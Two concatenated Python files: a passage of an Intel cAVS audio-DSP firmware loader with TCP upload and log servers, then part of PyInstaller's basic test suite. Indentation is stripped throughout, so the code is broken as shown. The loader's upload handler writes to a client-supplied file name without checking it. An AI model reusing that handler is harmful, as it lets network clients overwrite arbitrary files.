found_msg = f"Existing driver \"{mod}\" found"
if args.log_only:
log.info(found_msg)
else:
log.warning(found_msg + ", unloading module")
runx(f"rmmod -f {mod}")
# Disengage runtime power management so the kernel doesn't put it to sleep
with open(f"{pcidir}/power/control", "w") as ctrl:
ctrl.write("on")
# Make sure PCI memory space access and busmastering are enabled.
# Also disable interrupts so as not to confuse the kernel.
with open(f"{pcidir}/config", "wb+") as cfg:
cfg.seek(4)
cfg.write(b'\x06\x04')
# Standard HD Audio Registers
global hdamem
(hdamem, _) = bar_map(pcidir, 0)
hda = Regs(hdamem)
hda.GCAP = 0x0000
hda.GCTL = 0x0008
hda.SPBFCTL = 0x0704
hda.PPCTL = 0x0804
# Find the ID of the first output stream
hda_ostream_id = (hda.GCAP >> 8) & 0x0f # number of input streams
log.info(f"Selected output stream {hda_ostream_id} (GCAP = 0x{hda.GCAP:x})")
hda.SD_SPIB = 0x0708 + (8 * hda_ostream_id)
hda.freeze()
# Standard HD Audio Stream Descriptor
sd = Regs(hdamem + 0x0080 + (hda_ostream_id * 0x20))
sd.CTL = 0x00
sd.CBL = 0x08
sd.LVI = 0x0c
sd.BDPL = 0x18
sd.BDPU = 0x1c
sd.freeze()
# Intel Audio DSP Registers
global bar4_mmap
(bar4_mem, bar4_mmap) = bar_map(pcidir, 4)
dsp = Regs(bar4_mem)
dsp.ADSPCS = 0x00004
dsp.HIPCTDR = 0x00040 if cavs15 else 0x000c0
dsp.HIPCTDA = 0x000c4 # 1.8+ only
dsp.HIPCTDD = 0x00044 if cavs15 else 0x000c8
dsp.HIPCIDR = 0x00048 if cavs15 else 0x000d0
dsp.HIPCIDA = 0x000d4 # 1.8+ only
dsp.HIPCIDD = 0x0004c if cavs15 else 0x000d8
dsp.SRAM_FW_STATUS = 0x80000 # Start of first SRAM window
dsp.freeze()
return (hda, sd, dsp, hda_ostream_id)
def setup_dma_mem(fw_bytes):
(mem, phys_addr, _) = map_phys_mem(hda_ostream_id)
mem[0:len(fw_bytes)] = fw_bytes
log.info("Mapped 2M huge page at 0x%x to contain %d bytes of firmware"
% (phys_addr, len(fw_bytes)))
# HDA requires at least two buffers be defined, but we don't care about
# boundaries because it's all a contiguous region. Place a vestigial
# 128-byte (minimum size and alignment) buffer after the main one, and put
# the 4-entry BDL list into the final 128 bytes of the page.
buf0_len = HUGEPAGESZ - 2 * 128
buf1_len = 128
bdl_off = buf0_len + buf1_len
mem[bdl_off:bdl_off + 32] = struct.pack("<QQQQ",
phys_addr, buf0_len,
phys_addr + buf0_len, buf1_len)
log.info("Filled the buffer descriptor list (BDL) for DMA.")
return (phys_addr + bdl_off, 2)
global_mmaps = [] # protect mmap mappings from garbage collection!
# Maps 2M of contiguous memory using a single page from hugetlbfs,
# then locates its physical address for use as a DMA buffer.
def map_phys_mem(stream_id):
# Make sure hugetlbfs is mounted (not there on chromeos)
os.system("mount | grep -q hugetlbfs ||"
+ " (mkdir -p /dev/hugepages; "
+ " mount -t hugetlbfs hugetlbfs /dev/hugepages)")
# Ensure the kernel has enough budget for one new page
free = int(runx("awk '/HugePages_Free/ {print $2}' /proc/meminfo"))
if free == 0:
tot = 1 + int(runx("awk '/HugePages_Total/ {print $2}' /proc/meminfo"))
os.system(f"echo {tot} > /proc/sys/vm/nr_hugepages")
hugef_name = HUGEPAGE_FILE + str(stream_id)
hugef = open(hugef_name, "w+")
hugef.truncate(HUGEPAGESZ)
mem = mmap.mmap(hugef.fileno(), HUGEPAGESZ)
log.info("type of mem is %s", str(type(mem)))
global_mmaps.append(mem)
os.unlink(hugef_name)
# Find the local process address of the mapping, then use that to extract
# the physical address from the kernel's pagemap interface. The physical
# page frame number occupies the bottom bits of the entry.
mem[0] = 0 # Fault the page in so it has an address!
vaddr = ctypes.addressof(ctypes.c_int.from_buffer(mem))
vpagenum = vaddr >> 12
pagemap = open("/proc/self/pagemap", "rb")
pagemap.seek(vpagenum * 8)
pent = pagemap.read(8)
paddr = (struct.unpack("Q", pent)[0] & ((1 << 55) - 1)) * PAGESZ
pagemap.close()
return (mem, paddr, hugef)
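# Worked example of the pagemap math above (values are illustrative): a raw
# 64-bit entry of 0x80000000000c3e00 has the "present" bit (63) set and a page
# frame number of 0xc3e00 in bits 0-54, so paddr = 0xc3e00 * 4096 = 0xc3e00000.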
# Maps a PCI BAR and returns the in-process address
def bar_map(pcidir, barnum):
f = open(pcidir + "/resource" + str(barnum), "r+")
mm = mmap.mmap(f.fileno(), os.fstat(f.fileno()).st_size)
global_mmaps.append(mm)
log.info("Mapped PCI bar %d of length %d bytes."
% (barnum, os.fstat(f.fileno()).st_size))
return (ctypes.addressof(ctypes.c_int.from_buffer(mm)), mm)
# Syntactic sugar to make register block definition & use look nice.
# Instantiate from a base address, assign offsets to (uint32) named registers as
# fields, call freeze(), then the field acts as a direct alias for the register!
class Regs:
def __init__(self, base_addr):
vars(self)["base_addr"] = base_addr
vars(self)["ptrs"] = {}
vars(self)["frozen"] = False
def freeze(self):
vars(self)["frozen"] = True
def __setattr__(self, name, val):
if not self.frozen and name not in self.ptrs:
addr = self.base_addr + val
self.ptrs[name] = ctypes.c_uint32.from_address(addr)
else:
self.ptrs[name].value = val
def __getattr__(self, name):
return self.ptrs[name].value
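# Hedged example of the Regs pattern described above (the base address is a
# made-up placeholder; in this script real bases come from bar_map()):
#
#   regs = Regs(0xfebf0000)   # hypothetical MMIO base address
#   regs.GCTL = 0x0008        # before freeze(): assign the register's byte offset
#   regs.freeze()
#   regs.GCTL |= 1            # after freeze(): read-modify-write the register itself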
def runx(cmd):
return subprocess.check_output(cmd, shell=True).decode().rstrip()
def load_firmware(fw_file):
try:
fw_bytes = open(fw_file, "rb").read()
except Exception as e:
log.error(f"Could not read firmware file: `{fw_file}'")
log.error(e)
sys.exit(1)
(magic, sz) = struct.unpack("4sI", fw_bytes[0:8])
if magic == b'XMan':
log.info(f"Trimming {sz} bytes of extended manifest")
fw_bytes = fw_bytes[sz:len(fw_bytes)]
# This actually means "enable access to BAR4 registers"!
hda.PPCTL |= (1 << 30) # GPROCEN, "global processing enable"
log.info("Resetting HDA device")
hda.GCTL = 0
while hda.GCTL & 1: pass
hda.GCTL = 1
while not hda.GCTL & 1: pass
log.info("Powering down DSP cores")
dsp.ADSPCS = 0xffff
while dsp.ADSPCS & 0xff000000: pass
log.info(f"Configuring HDA stream {hda_ostream_id} to transfer firmware image")
(buf_list_addr, num_bufs) = setup_dma_mem(fw_bytes)
sd.CTL = 1
while (sd.CTL & 1) == 0: pass
sd.CTL = 0
while (sd.CTL & 1) == 1: pass
sd.CTL = (1 << 20) # Set stream ID to anything non-zero
sd.BDPU = (buf_list_addr >> 32) & 0xffffffff
sd.BDPL = buf_list_addr & 0xffffffff
sd.CBL = len(fw_bytes)
sd.LVI = num_bufs - 1
hda.PPCTL |= (1 << hda_ostream_id)
# SPIB ("Software Position In Buffer") is an Intel HDA extension
# that puts a transfer boundary into the stream beyond which the
# other side will not read. The ROM wants to poll on a "buffer
# full" bit on the other side that only works with this enabled.
hda.SPBFCTL |= (1 << hda_ostream_id)
hda.SD_SPIB = len(fw_bytes)
# Start DSP. Host needs to provide power to all cores on 1.5
# (which also starts them) and 1.8 (merely gates power, DSP also
# has to set PWRCTL). The bits for cores other than 0 are ignored
# on 2.5 where the DSP has full control.
log.info(f"Starting DSP, ADSPCS = 0x{dsp.ADSPCS:x}")
dsp.ADSPCS = 0xff0000 if not cavs25 else 0x01fefe
while (dsp.ADSPCS & 0x1000000) == 0: pass
# Wait for the ROM to boot and signal it's ready. This short
# sleep seems to be needed; if we're banging on the memory window
# during initial boot (before/while the window control registers
# are configured?) the DSP hardware will hang fairly reliably.
log.info("Wait for ROM startup")
time.sleep(0.1)
while (dsp.SRAM_FW_STATUS >> 24) != 5: pass
# Send the DSP an IPC message to tell the device how to boot.
# Note: with cAVS 1.8+ the ROM receives the stream argument as an
# index within the array of output streams (and we always use the
# first one by construction). But with 1.5 it's the HDA index,
# and depends on the number of input streams on the device.
stream_idx = hda_ostream_id if cavs15 else 0
ipcval = ( (1 << 31) # BUSY bit
| (0x01 << 24) # type = PURGE_FW
| (1 << 14) # purge_fw = 1
| (stream_idx << 9)) # dma_id
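    # Worked example (a sketch): on cAVS 1.8+/2.5 stream_idx is 0, so
    # ipcval = 0x80000000 | 0x01000000 | 0x4000 = 0x81004000.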
log.info(f"Sending IPC command, HIPIDR = 0x{ipcval:x}")
dsp.HIPCIDR = ipcval
log.info(f"Starting DMA, FW_STATUS = 0x{dsp.SRAM_FW_STATUS:x}")
sd.CTL |= 2 # START flag
wait_fw_entered()
# Turn DMA off and reset the stream. Clearing START first is a
# noop per the spec, but absolutely required for stability.
# Apparently the reset doesn't stop the stream, and the next load
# starts before it's ready and kills the load (and often the DSP).
# The sleep too is required, on at least one board (a fast
# chromebook) putting the two writes next each other also hangs
# the DSP!
sd.CTL &= ~2 # clear START
time.sleep(0.1)
sd.CTL |= 1
log.info(f"cAVS firmware load complete")
def wait_fw_entered():
log.info("Waiting for firmware handoff, FW_STATUS = 0x%x", dsp.SRAM_FW_STATUS)
for _ in range(200):
alive = dsp.SRAM_FW_STATUS & ((1 << 28) - 1) == 5 # "FW_ENTERED"
if alive:
break
time.sleep(0.01)
if not alive:
log.warning("Load failed? FW_STATUS = 0x%x", dsp.SRAM_FW_STATUS)
# This SHOULD be just "mem[start:start+length]", but slicing an mmap
# array seems to be unreliable on one of my machines (python 3.6.9 on
# Ubuntu 18.04). Read out bytes individually.
def win_read(start, length):
try:
return b''.join(bar4_mmap[WINSTREAM_OFFSET + x].to_bytes(1, 'little')
for x in range(start, start + length))
except IndexError as ie:
# A FW in a bad state may cause winstream garbage
log.error("IndexError in bar4_mmap[%d + %d]", WINSTREAM_OFFSET, start)
log.error("bar4_mmap.size()=%d", bar4_mmap.size())
raise ie
def win_hdr():
return struct.unpack("<IIII", win_read(0, 16))
# Python implementation of the same algorithm in sys_winstream_read(),
# see there for details.
def winstream_read(last_seq):
while True:
(wlen, start, end, seq) = win_hdr()
if last_seq == 0:
last_seq = seq if args.no_history else (seq - ((end - start) % wlen))
if seq == last_seq or start == end:
return (seq, "")
behind = seq - last_seq
if behind > ((end - start) % wlen):
return (seq, "")
copy = (end - behind) % wlen
suffix = min(behind, wlen - copy)
result = win_read(16 + copy, suffix)
if suffix < behind:
result += win_read(16, behind - suffix)
(wlen, start1, end, seq1) = win_hdr()
if start1 == start and seq1 == seq:
# Best effort attempt at decoding, replacing unusable characters
# Found to be useful when it really goes wrong
return (seq, result.decode("utf-8", "replace"))
async def ipc_delay_done():
await asyncio.sleep(0.1)
dsp.HIPCTDA = 1<<31
ipc_timestamp = 0
# Super-simple command language, driven by the test code on the DSP
def ipc_command(data, ext_data):
send_msg = False
done = True
log.debug ("ipc data %d, ext_data %x", data, ext_data)
if data == 0: # noop, with synchronous DONE
pass
elif data == 1: # async command: signal DONE after a delay (on 1.8+)
if not cavs15:
done = False
asyncio.ensure_future(ipc_delay_done())
elif data == 2: # echo back ext_data as a message command
send_msg = True
elif data == 3: # set ADSPCS
dsp.ADSPCS = ext_data
elif data == 4: # echo back microseconds since last timestamp command
global ipc_timestamp
t = round(time.time() * 1e6)
ext_data = t - ipc_timestamp
ipc_timestamp = t
send_msg = True
elif data == 5: # copy word at outbox[ext_data >> 16] to inbox[ext_data & 0xffff]
src = OUTBOX_OFFSET + 4 * (ext_data >> 16)
dst = INBOX_OFFSET + 4 * (ext_data & 0xffff)
for i in range(4):
bar4_mmap[dst + i] = bar4_mmap[src + i]
elif data == 6: # HDA RESET (init if not exists)
stream_id = ext_data & 0xff
if stream_id in hda_streams:
hda_streams[stream_id].reset()
else:
hda_str = HDAStream(stream_id)
hda_streams[stream_id] = hda_str
elif data == 7: # HDA CONFIG
stream_id = ext_data & 0xFF
buf_len = ext_data >> 8 & 0xFFFF
hda_str = hda_streams[stream_id]
hda_str.config(buf_len)
elif data == 8: # HDA START
stream_id = ext_data & 0xFF
hda_streams[stream_id].start()
hda_streams[stream_id].mem.seek(0)
elif data == 9: # HDA STOP
stream_id = ext_data & 0xFF
hda_streams[stream_id].stop()
elif data == 10: # HDA VALIDATE
stream_id = ext_data & 0xFF
hda_str = hda_streams[stream_id]
hda_str.debug()
is_ramp_data = True
hda_str.mem.seek(0)
for (i, val) in enumerate(hda_str.mem.read(256)):
if i != val:
is_ramp_data = False
# log.info("stream[%d][%d]: %d", stream_id, i, val) # debug helper
log.info("Is ramp data? " + str(is_ramp_data))
ext_data = int(is_ramp_data)
log.info(f"Ext data to send back on ramp status {ext_data}")
send_msg = True
elif data == 11: # HDA HOST OUT SEND
stream_id = ext_data & 0xff
buf = bytearray(256)
for i in range(0, 256):
buf[i] = i
hda_streams[stream_id].write(buf)
elif data == 12: # HDA PRINT
log.info("Doing HDA Print")
stream_id = ext_data & 0xFF
buf_len = ext_data >> 8 & 0xFFFF
hda_str = hda_streams[stream_id]
pos = hda_str.mem.tell()
buf_data = hda_str.mem.read(buf_len).decode("utf-8", "replace")
log.info(f"DSP LOG MSG (idx: {pos}, len: {buf_len}): {buf_data}")
pos = hda_str.mem.tell()
if pos >= hda_str.buf_len*2:
log.info(f"Wrapping log reader, pos {pos} len {hda_str.buf_len}")
hda_str.mem.seek(0)
else:
log.warning(f"cavstool: Unrecognized IPC command 0x{data:x} ext 0x{ext_data:x}")
dsp.HIPCTDR = 1<<31 # Ack local interrupt, also signals DONE on v1.5
if cavs18:
time.sleep(0.01) # Needed on 1.8, or the command below won't send!
if done and not cavs15:
dsp.HIPCTDA = 1<<31 # Signal done
if send_msg:
dsp.HIPCIDD = ext_data
dsp.HIPCIDR = (1<<31) | ext_data
async def _main(server):
    # TODO: this bit me; remove the globals and write a small FirmwareLoader class (or similar) to contain them.
global hda, sd, dsp, hda_ostream_id, hda_streams
try:
(hda, sd, dsp, hda_ostream_id) = map_regs()
except Exception as e:
log.error("Could not map device in sysfs; run as root?")
log.error(e)
sys.exit(1)
log.info(f"Detected cAVS {'1.5' if cavs15 else '1.8+'} hardware")
if args.log_only:
wait_fw_entered()
else:
if not fw_file:
log.error("Firmware file argument missing")
sys.exit(1)
load_firmware(fw_file)
time.sleep(0.1)
if not args.quiet:
adsp_log("--\n", server)
hda_streams = dict()
last_seq = 0
while start_output is True:
await asyncio.sleep(0.03)
(last_seq, output) = winstream_read(last_seq)
if output:
adsp_log(output, server)
if dsp.HIPCTDR & 0x80000000:
ipc_command(dsp.HIPCTDR & ~0x80000000, dsp.HIPCTDD)
if dsp.HIPCIDA & 0x80000000:
dsp.HIPCIDA = 1<<31 # must ACK any DONE interrupts that arrive!
class adsp_request_handler(socketserver.BaseRequestHandler):
"""
    The request handler class for controlling the actions of the server.
"""
def receive_fw(self, filename):
try:
            with open(filename, 'wb') as f:
cnt = 0
log.info("Receiving...")
while True:
l = self.request.recv(BUF_SIZE)
ll = len(l)
cnt = cnt + ll
if not l:
break
else:
f.write(l)
except Exception as e:
log.error(f"Get exception {e} during FW transfer.")
return 1
log.info(f"Done Receiving {cnt}.")
def handle(self):
global start_output, fw_file
cmd = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {cmd}")
action = cmd.decode("utf-8")
log.debug(f'load {action}')
if action == CMD_DOWNLOAD:
self.request.sendall(cmd)
recv_fn = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {recv_fn}")
try:
tmp_file = recv_fn.decode("utf-8")
except UnicodeDecodeError:
tmp_file = "zephyr.ri.decode_error"
log.info(f'did not receive a correct filename')
lock.acquire()
fw_file = tmp_file
ret = self.receive_fw(fw_file)
if not ret:
start_output = True
lock.release()
log.debug(f'{recv_fn}, {fw_file}, {start_output}')
elif action == CMD_LOG_STOP:
self.request.sendall(cmd)
lock.acquire()
start_output = False
if fw_file:
os.remove(fw_file)
fw_file = None
lock.release()
else:
log.error("incorrect load communitcation!")
class adsp_log_handler(socketserver.BaseRequestHandler):
"""
    The log handler class for grabbing the server's output messages.
"""
def run_adsp(self):
self.loop = asyncio.get_event_loop()
self.loop.run_until_complete(_main(self))
def handle(self):
global start_output, fw_file
cmd = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {cmd}")
action = cmd.decode("utf-8")
log.debug(f'monitor {action}')
if action == CMD_LOG_START:
self.request.sendall(cmd)
log.info(f"Waiting for instruction...")
while start_output is False:
time.sleep(1)
log.info(f"Loaded FW {fw_file} and running...")
if os.path.exists(fw_file):
self.run_adsp()
self.request.sendall("service complete.".encode())
log.info("service complete.")
else:
log.error("cannot find the FW file")
lock.acquire()
fw_file = None
start_output = False
lock.release()
else:
log.error("incorrect monitor communitcation!")
def adsp_log(output, server):
if server:
server.request.sendall(output.encode("utf-8"))
else:
sys.stdout.write(output)
sys.stdout.flush()
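# Hedged client-side sketch of the wire protocol served by the two handlers
# above (the real client lives in a separate script not shown here; `host` and
# the firmware file name are placeholders):
#
#   import socket
#   # Request port: upload the firmware and arm the loader.
#   with socket.create_connection((host, PORT_REQ)) as s:
#       s.sendall(CMD_DOWNLOAD.encode()); s.recv(BUF_SIZE)   # command echoed back
#       s.sendall(b"zephyr.ri")                               # firmware file name
#       time.sleep(1)  # let the name arrive as its own message before the data
#       with open("zephyr.ri", "rb") as f:
#           s.sendall(f.read())                               # then close the socket
#   # Log port: start logging and stream DSP output until the service completes.
#   with socket.create_connection((host, PORT_LOG)) as s:
#       s.sendall(CMD_LOG_START.encode()); s.recv(BUF_SIZE)   # command echoed back
#       while True:
#           chunk = s.recv(BUF_SIZE)
#           if not chunk:
#               break
#           sys.stdout.write(chunk.decode("utf-8", "replace"))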
def get_host_ip():
"""
    Helper used to detect the host's serving IP address.
"""
interfaces = netifaces.interfaces()
for i in interfaces:
if i != "lo":
try:
netifaces.ifaddresses(i)
ip = netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr']
log.info (f"Use interface {i}, IP address: {ip}")
except Exception:
log.info(f"Ignore the interface {i} which is not activated.")
return ip
ap = argparse.ArgumentParser(description="DSP loader/logger tool")
ap.add_argument("-q", "--quiet", action="store_true",
help="No loader output, just DSP logging")
ap.add_argument("-l", "--log-only", action="store_true",
help="Don't load firmware, just show log output")
ap.add_argument("-n", "--no-history", action="store_true",
help="No current log buffer at start, just new output")
ap.add_argument("-s", "--server-addr",
help="No current log buffer at start, just new output")
ap.add_argument("fw_file", nargs="?", help="Firmware file")
args = ap.parse_args()
if args.quiet:
log.setLevel(logging.WARN)
if args.fw_file:
fw_file = args.fw_file
else:
fw_file = None
if args.server_addr:
HOST = args.server_addr
else:
HOST = get_host_ip()
if __name__ == "__main__":
# Launch the command request service
socketserver.TCPServer.allow_reuse_address = True
req_server = socketserver.TCPServer((HOST, PORT_REQ), adsp_request_handler)
req_t = threading.Thread(target=req_server.serve_forever, daemon=True)
# Activate the log service which output adsp execution
with socketserver.TCPServer((HOST, PORT_LOG), adsp_log_handler) as log_server:
try:
log.info("Req server start...")
req_t.start()
log.info("Log server start...")
log_server.serve_forever()
except KeyboardInterrupt:
lock.acquire()
start_output = False
lock.release()
log_server.shutdown()
req_server.shutdown()
|
test_basic.py
|
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2022, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
import locale
import os
import sys
import shutil
import pytest
from PyInstaller.compat import is_darwin, is_win
from PyInstaller.utils.tests import importorskip, skipif, skipif_no_compiler, xfail
def test_run_from_path_environ(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py', run_from_path=True)
@pytest.mark.linux
def test_absolute_ld_library_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_ld_library_path.py')
def test_absolute_python_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py')
@pytest.mark.linux
@skipif(not os.path.exists('/proc/self/status'), reason='/proc/self/status does not exist')
@pytest.mark.parametrize("symlink_name", ["symlink", "very_long_name_in_symlink", "sub/dir/progam"])
def test_symlink_basename_is_kept(pyi_builder_spec, symlink_name, tmpdir, SPEC_DIR, SCRIPT_DIR):
def patch(spec_name, symlink_name):
content = SPEC_DIR.join(spec_name).read_text(encoding="utf-8")
content = content.replace("@SYMLINKNAME@", symlink_name)
content = content.replace("@SCRIPTDIR@", str(SCRIPT_DIR))
outspec = tmpdir.join(spec_name)
outspec.write_text(content, encoding="utf-8", ensure=True)
return outspec
specfile = patch("symlink_basename_is_kept.spec", symlink_name)
pyi_builder_spec.test_spec(str(specfile), app_name=symlink_name)
def test_pyz_as_external_file(pyi_builder, monkeypatch):
# This tests the not well documented and seldom used feature of having the PYZ-archive in a separate file (.pkg).
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = False
return EXE(*args, **kwargs)
# :todo: find a better way to not even run this test in onefile-mode
if pyi_builder._mode == 'onefile':
pytest.skip('only --onedir')
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("print('Hello Python!')")
def test_base_modules_regex(pyi_builder):
"""
Verify that the regex for excluding modules listed in PY3_BASE_MODULES does not exclude other modules.
"""
pyi_builder.test_source("""
import resources_testmod
print('OK')
""")
def test_celementtree(pyi_builder):
pyi_builder.test_source("""
from xml.etree.cElementTree import ElementTree
print('OK')
""")
# Test a build with some complexity with the ``noarchive`` debug option.
def test_noarchive(pyi_builder):
pyi_builder.test_source("from xml.etree.cElementTree import ElementTree", pyi_args=['--debug=noarchive'])
@importorskip('codecs')
def test_codecs(pyi_builder):
pyi_builder.test_script('pyi_codecs.py')
def test_compiled_filenames(pyi_builder):
pyi_builder.test_source(
"""
import pyi_dummy_module
from os.path import isabs
assert not isabs(pyi_dummy_module.dummy.__code__.co_filename), (
"pyi_dummy_module.dummy.__code__.co_filename has compiled filename: %s" %
(pyi_dummy_module.dummy.__code__.co_filename, )
)
assert not isabs(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename), (
"pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename has compiled filename: %s" %
(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename, )
)
"""
)
def test_decoders_ascii(pyi_builder):
pyi_builder.test_source(
"""
# Convert type 'bytes' to type 'str'.
assert b'foo'.decode('ascii') == 'foo'
"""
)
def test_distutils_submod(pyi_builder):
# Test import of submodules of distutils package.
# PyI fails to include `distutils.version` when running from virtualenv.
pyi_builder.test_source("""
from distutils.version import LooseVersion
""")
def test_dynamic_module(pyi_builder):
pyi_builder.test_source(
"""
import pyi_testmod_dynamic
# The value 'foo' should not be None.
print("'foo' value: %s" % pyi_testmod_dynamic.foo)
assert pyi_testmod_dynamic.foo is not None
assert pyi_testmod_dynamic.foo == 'A new value!'
"""
)
def test_email(pyi_builder):
pyi_builder.test_source(
"""
from email import utils
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
"""
)
@importorskip('tinyaes')
def test_feature_crypto(pyi_builder):
pyi_builder.test_source(
"""
from pyimod00_crypto_key import key
from pyimod02_archive import CRYPT_BLOCK_SIZE
# Test against issue #1663: importing a package in the bootstrap
# phase should not interfere with subsequent imports.
import tinyaes
assert type(key) is str
# The test runner uses 'test_key' as key.
assert key == 'test_key'.zfill(CRYPT_BLOCK_SIZE)
""",
pyi_args=['--key=test_key']
)
def test_feature_nocrypto(pyi_builder):
pyi_builder.test_source(
"""
try:
import pyimod00_crypto_key
raise AssertionError('The pyimod00_crypto_key module must NOT be there if crypto is disabled.')
except ImportError:
pass
"""
)
def test_filename(pyi_builder):
pyi_builder.test_script('pyi_filename.py')
def test_getfilesystemencoding(pyi_builder):
pyi_builder.test_script('pyi_getfilesystemencoding.py')
def test_helloworld(pyi_builder):
pyi_builder.test_source("print('Hello Python!')")
def test_module__file__attribute(pyi_builder):
pyi_builder.test_script('pyi_module__file__attribute.py')
def test_module_attributes(tmpdir, pyi_builder):
# Create file in tmpdir with path to python executable and if it is running in debug mode.
# Test script uses python interpreter to compare module attributes.
with open(os.path.join(tmpdir.strpath, 'python_exe.build'), 'w') as f:
f.write(sys.executable + "\n")
f.write('debug=%s' % __debug__ + '\n')
    # On Windows we need to preserve the system PATH for subprocesses in tests.
f.write(os.environ.get('PATH') + '\n')
pyi_builder.test_script('pyi_module_attributes.py')
def test_module_reload(pyi_builder):
pyi_builder.test_script('pyi_module_reload.py')
def test_ctypes_hooks_are_in_place(pyi_builder):
pyi_builder.test_source(
"""
import ctypes
assert ctypes.CDLL.__name__ == 'PyInstallerCDLL', ctypes.CDLL
"""
)
# TODO test it on OS X.
@skipif_no_compiler
def test_load_dll_using_ctypes(monkeypatch, pyi_builder, compiled_dylib):
# Note that including the data_dir fixture copies files needed by this test.
#
# TODO: make sure PyInstaller is able to find the library and bundle it with the app.
# # If the required dylib does not reside in the current directory, the Analysis class machinery,
# # based on ctypes.util.find_library, will not find it. This was done on purpose for this test,
# # to show how to give Analysis class a clue.
# if is_win:
# os.environ['PATH'] = os.path.abspath(CTYPES_DIR) + ';' + os.environ['PATH']
# else:
# os.environ['LD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['DYLD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['LIBPATH'] = CTYPES_DIR
# Build and run the app.
pyi_builder.test_script('pyi_load_dll_using_ctypes.py')
def test_get_meipass_value(pyi_builder):
pyi_builder.test_script('pyi_get_meipass_value.py')
def test_chdir_meipass(pyi_builder):
# Ensure meipass dir exists.
pyi_builder.test_source(
"""
import os, sys
os.chdir(sys._MEIPASS)
print(os.getcwd())
"""
)
def test_option_exclude_module(pyi_builder):
"""
Test to ensure that when using option --exclude-module=xml.sax
the module 'xml.sax' won't be bundled.
"""
pyi_builder.test_source(
"""
try:
import xml.sax
# Option --exclude-module=xml.sax did not work and the module
# was successfully imported.
raise SystemExit('Module xml.sax was excluded but it is '
'bundled with the executable.')
except ImportError:
# The Import error is expected since PyInstaller should
# not bundle 'xml.sax' module.
pass
""",
pyi_args=['--exclude-module', 'xml.sax']
)
def test_option_verbose(pyi_builder, monkeypatch):
"""
Test to ensure that option V can be set and has effect.
"""
# This option is like 'python -v' - trace import statements.
# 'None' should be allowed or '' also.
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('v', None, 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
print('test - PYTHONVERBOSE - trace import statements')
import re # just import anything
print('test - done')
"""
)
def test_option_w_unset(pyi_builder):
"""
Test to ensure that option W is not set by default.
"""
pyi_builder.test_source("""
import sys
assert 'ignore' not in sys.warnoptions
""")
def test_option_w_ignore(pyi_builder, monkeypatch, capsys):
"""
Test to ensure that option W can be set.
"""
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('W ignore', '', 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("""
import sys
assert 'ignore' in sys.warnoptions
""")
_, err = capsys.readouterr()
assert "'import warnings' failed" not in err
@pytest.mark.parametrize("distutils", ["", "from distutils "])
def test_python_makefile(pyi_builder, distutils):
"""
Tests hooks for ``sysconfig`` and its near-duplicate ``distutils.sysconfig``. Raises an import error if we fail
to collect the special module that contains the details from pyconfig.h and the Makefile.
"""
# Ideally we would test that the contents of `sysconfig.get_config_vars()` dict are the same frozen vs. unfrozen,
# but because some values are paths into a Python installation's guts, these will point into the frozen app when
# frozen, and therefore not match. Without some fiddly filtering of the paths, this is impossible.
# As a compromise, test that the dictionary keys are the same to be sure that there is no conditional initialisation
# of get_config_vars(). I.e., that get_config_vars() does not silently return an empty dictionary if it cannot find
# the information it needs.
if distutils:
from distutils import sysconfig
else:
import sysconfig
unfrozen_keys = sorted(sysconfig.get_config_vars().keys())
pyi_builder.test_source(
"""
# The error is raised immediately on import.
{}import sysconfig
        # But just in case Python later opts for some lazy loading, force
# configuration retrieval:
from pprint import pprint
pprint(sysconfig.get_config_vars())
unfrozen_keys = {}
assert sorted(sysconfig.get_config_vars()) == unfrozen_keys
""".format(distutils, unfrozen_keys)
)
def test_set_icon(pyi_builder, data_dir):
if is_win:
args = ['--icon', os.path.join(data_dir.strpath, 'pyi_icon.ico')]
elif is_darwin:
# On OS X icon is applied only for windowed mode.
args = ['--windowed', '--icon', os.path.join(data_dir.strpath, 'pyi_icon.icns')]
else:
pytest.skip('option --icon works only on Windows and Mac OS X')
pyi_builder.test_source("print('Hello Python!')", pyi_args=args)
@pytest.mark.win32
def test_invalid_icon(tmpdir, data_dir):
"""
Ensure a sane error message is given if the user provides a PNG or other unsupported format of image.
"""
from PyInstaller import PLATFORM, HOMEPATH
from PyInstaller.utils.win32.icon import CopyIcons
icon = os.path.join(data_dir.strpath, 'pyi_icon.png')
bootloader_src = os.path.join(HOMEPATH, 'PyInstaller', 'bootloader', PLATFORM, "run.exe")
exe = os.path.join(tmpdir, "run.exe")
shutil.copy(bootloader_src, exe)
assert os.path.isfile(icon)
assert os.path.isfile(exe)
with pytest.raises(
ValueError, match="path '.*pyi_icon.png' .* not in the correct format.*convert your '.png' file to a '.ico' .*"
):
CopyIcons(exe, icon)
def test_python_home(pyi_builder):
pyi_builder.test_script('pyi_python_home.py')
def test_stderr_encoding(tmpdir, pyi_builder):
